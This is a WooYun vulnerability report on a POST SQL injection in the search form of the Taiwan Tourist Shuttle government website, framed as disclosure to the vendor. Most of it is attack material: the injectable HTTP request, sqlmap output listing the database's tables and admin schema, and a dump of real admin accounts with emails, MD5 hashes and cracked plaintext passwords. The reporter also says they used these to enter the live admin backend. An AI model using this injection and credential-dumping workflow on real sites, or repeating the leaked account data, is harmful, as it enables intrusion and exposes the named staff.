乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-09: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
属于台湾省交通部觀光局的,有google绿标
台灣好行官方網站主页搜索的地方post注入
http://**.**.**.**/Search/Do/
post包
POST /Search/Do/ HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/Main/Lang/?redirect=/Main/Index/&lang=zh-twCookie: PHPSESSID=tp835upbb4qopb5gqo13q3bsu5; __utma=118975756.14135579.1449631688.1449631688.1449631688.1; __utmb=118975**.**.**.**9631688; __utmc=118975756; __utmz=118975756.1449631688.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 13search_word=1
[11:32:52] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: Apache 2.2.15back-end DBMS: MySQL 5.0[11:32:52] [INFO] fetching current user[11:32:53] [INFO] retrieved: TBROC26@localhostcurrent user: 'TBROC26@localhost'
dbs
available databases [2]:[*] information_schema[*] TBROC26
Database: TBROC26[57 tables]+-------------------------+| besttour_busstops || file || tt_acl_ctrl || tt_admin_group || tt_admin_group_acl || tt_admin_menu || tt_admin_menu_group || tt_admin_menu_group2 || tt_admin_response || tt_admin_user || tt_admin_user_old || tt_banner || tt_besttour || tt_besttour_busstops || tt_besttour_bustimes || tt_besttour_direction || tt_besttour_scene || tt_besttour_service || tt_besttour_service2 || tt_besttour_time || tt_besttour_time_link || tt_besttour_traffic || tt_controller_action || tt_event_register || tt_file || tt_group || tt_group_acl || tt_guestbook || tt_i18n || tt_i18n_data || tt_key_word || tt_lang || tt_link || tt_lottery || tt_news || tt_o_admin_menu || tt_o_admin_user || tt_o_file || tt_playtour || tt_playtour_scene || tt_qa || tt_qa_cate || tt_scene || tt_setting || tt_station || tt_station_map || tt_station_time || tt_system || tt_taiwantrip_set || tt_ticket_link || tt_time_link || tt_tour_date_type || tt_tour_time || tt_train_xml || tt_weather || tt_weather_week || zdrop_besttour_busstops |+-------------------------+
涉及手机 邮箱 用户 密码 登入ip.......
+---------------+---------------------+| Column | Type |+---------------+---------------------+| account | varchar(16) || admin_user_id | int(10) unsigned || avatar | int(11) unsigned || besttour_id | varchar(255) || create_time | timestamp || disabled | enum('T','F') || email | varchar(32) || group_id | tinyint(3) unsigned || last_login | datetime || modify_time | datetime || name | varchar(16) || password | varchar(32) || removed | enum('T','F') || sid | varchar(32) || super | enum('T','F') || user_agent | varchar(255) || user_ip | varchar(15) |+---------------+---------------------+
帐号密码,大部分都解密了
----+--------+-------------------------------------------+---------+---------+-------+------------+---------+| account | admin_user_id | avatar | besttour_id | create_time | disabled | email | group_id | last_login | modify_time | name | password | removed | sid | super | user_agent | user_ip |+---------+---------------+--------+-------------+---------------------+----------+--------------------------+----------+---------------------+---------------------+--------+-------------------------------------------+---------+---------+-------+------------+---------+| admin | 1 | 0 | NULL | 2010-07-28 14:37:45 | F | admin@**.**.**.** | 1 | 2010-08-02 16:03:18 | 2010-07-28 23:04:46 | ????? | 827ccb0eea8a706c4c34a16891f84e7b (12345) | F | <blank> | T | <blank> | <blank> || tirme | 2 | 0 | NULL | 2010-07-28 23:06:14 | F | tirme@**.**.**.** | 1 | 2010-07-28 23:12:01 | 2010-07-29 02:56:17 | ??? | d41d8cd98f00b204e9800998ecf8427e | F | <blank> | F | <blank> | <blank> || winny | 3 | 0 | NULL | 2010-08-14 21:47:31 | F | winny@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2010-08-14 21:47:31 | winny | 4297f44b13955235245b2497399d7a93 (123123) | F | <blank> | F | <blank> | <blank> || tbroc | 5 | 0 | NULL | 2010-09-07 23:17:51 | F | b213999@**.**.**.** | 4 | 0000-00-00 00:00:00 | 2010-09-07 23:17:51 | tbroc | 0221d64d9a8accf56122e74cb36940b6 | F | <blank> | F | <blank> | <blank> || jeremy | 6 | 0 | NULL | 2010-09-28 12:18:37 | F | arkly365@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-07-01 11:20:50 | jeremy | 827ccb0eea8a706c4c34a16891f84e7b (12345) | F | <blank> | F | <blank> | <blank> || clair | 7 | 0 | NULL | 2011-06-21 11:52:40 | F | clair@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-06-21 11:52:40 | clair | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> || yoyo | 8 | 0 | NULL | 2011-07-04 14:47:40 | F | yoyo@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-07-04 14:47:40 | yoyo | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> || yumin | 9 | 0 | NULL | 2011-07-20 10:41:32 | F | yumin@**.**.**.** | 5 | 0000-00-00 00:00:00 | 2011-07-20 10:41:32 | yumin | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> |+---------+---------------+--------+-------------+---------------------+----------+--------------------------+----------+---------------------+---------------------+--------+-------------------------------------------+---------+---------+-------+------------+---------+
扫了一圈没发现后台后来试试了/admin/结果自己跳出来了后台登入页面
通过注入密码,已入后台,可以管理留言严重的是管理全部路线,全部行程分配
危害等级:高
漏洞Rank:17
确认时间:2015-12-14 03:53
感謝通報
暂无